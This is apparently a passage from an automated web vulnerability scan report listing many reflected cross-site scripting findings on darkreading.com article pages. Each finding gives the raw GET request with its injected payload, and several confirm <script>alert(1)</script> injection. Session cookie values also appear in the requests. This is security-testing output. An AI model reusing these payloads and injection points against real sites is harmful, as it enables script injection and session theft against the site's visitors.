The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a727'><a>35ae823d1ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701534/index.html1a727'><a>35ae823d1ed HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <a href='http://www.darkreading.com/security/article/225701534/index.html1a727'><a>35ae823d1ed?fmid=12034'> ...[SNIP]...
3.553. http://www.darkreading.com/security/article/225701534/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225701534/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bd"><script>alert(1)</script>dad833f79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225701534/index.html?852bd"><script>alert(1)</script>dad833f79d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9663"><a>5b75d38a4ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb9663"><a>5b75d38a4ef/225701866/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af0b6"><a>6a756b8e2e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225701866af0b6"><a>6a756b8e2e8/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f918'><a>3bfeea6cd5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701866/index.html5f918'><a>3bfeea6cd5b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50fb2"><a>ecc055976b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701866/index.html50fb2"><a>ecc055976b1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Busted Al ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225701866%2Findex.html50fb2%22%3E%3Ca%3Eecc055976b1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225701866/index.html50fb2"><a>ecc055976b1"> ...[SNIP]...
3.558. http://www.darkreading.com/security/article/225701866/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225701866/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e5e"><script>alert(1)</script>0743242781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225701866/index.html?94e5e"><script>alert(1)</script>0743242781=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a247"><a>8c022efe8a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1a247"><a>8c022efe8a3/225702192/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ea1"><a>96404cac7f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702192f0ea1"><a>96404cac7f9/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94dad'><a>643ad073b31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702192/index.html94dad'><a>643ad073b31 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79179"><a>2115d49a26e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702192/index.html79179"><a>2115d49a26e HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Six Messy ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225702192%2Findex.html79179%22%3E%3Ca%3E2115d49a26e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225702192/index.html79179"><a>2115d49a26e"> ...[SNIP]...
3.563. http://www.darkreading.com/security/article/225702192/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225702192/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e9e"><script>alert(1)</script>8864cd82cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702192/index.html?24e9e"><script>alert(1)</script>8864cd82cb6=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d5c1"><a>316dd9ee0aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1d5c1"><a>316dd9ee0aa/225702468/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3925"><a>5a6a036882b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702468f3925"><a>5a6a036882b/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb36c'><a>061a2b29401 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702468/index.htmleb36c'><a>061a2b29401 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489fc"><a>153219ff849 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702468/index.html489fc"><a>153219ff849 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>'Robin Sa ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225702468%2Findex.html489fc%22%3E%3Ca%3E153219ff849&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225702468/index.html489fc"><a>153219ff849"> ...[SNIP]...
3.568. http://www.darkreading.com/security/article/225702468/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225702468/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c8e"><script>alert(1)</script>0c3a0054c23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702468/index.html?65c8e"><script>alert(1)</script>0c3a0054c23=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8dd"><a>21212bbf243 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article5f8dd"><a>21212bbf243/225702839/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59f3"><a>48c27a4826a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225702839e59f3"><a>48c27a4826a/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc65d"><a>af65a8b6723 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702839/index.htmlfc65d"><a>af65a8b6723 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b91ec'><a>923e17d3e45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225702839/index.htmlb91ec'><a>923e17d3e45 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <a href='http://www.darkreading.com/security/article/225702839/index.htmlb91ec'><a>923e17d3e45?fmid=12004'> ...[SNIP]...
3.573. http://www.darkreading.com/security/article/225702839/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225702839/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae1b"><script>alert(1)</script>35eba9c0f8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225702839/index.html?eae1b"><script>alert(1)</script>35eba9c0f8a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fe2"><a>928f4186047 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article78fe2"><a>928f4186047/226600195/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1c5"><a>ee51f059348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226600195be1c5"><a>ee51f059348/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe14b"><a>6463dee114d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226600195/index.htmlfe14b"><a>6463dee114d HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa57e'><a>7226366858a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226600195/index.htmlaa57e'><a>7226366858a HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/226600195/index.htmlaa57e'><a>7226366858a'> ...[SNIP]...
3.578. http://www.darkreading.com/security/article/226600195/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/226600195/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c477"><script>alert(1)</script>ea3c48f051c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/226600195/index.html?9c477"><script>alert(1)</script>ea3c48f051c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 781ee"><a>1a47923760b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article781ee"><a>1a47923760b/226700229/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f35e2"><a>fba3d4ef6bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/226700229f35e2"><a>fba3d4ef6bc/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c2a2"><a>1e3a0d86d20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/226700229/index.html1c2a2"><a>1e3a0d86d20 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a47c'><a>5fdfbca4d81 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
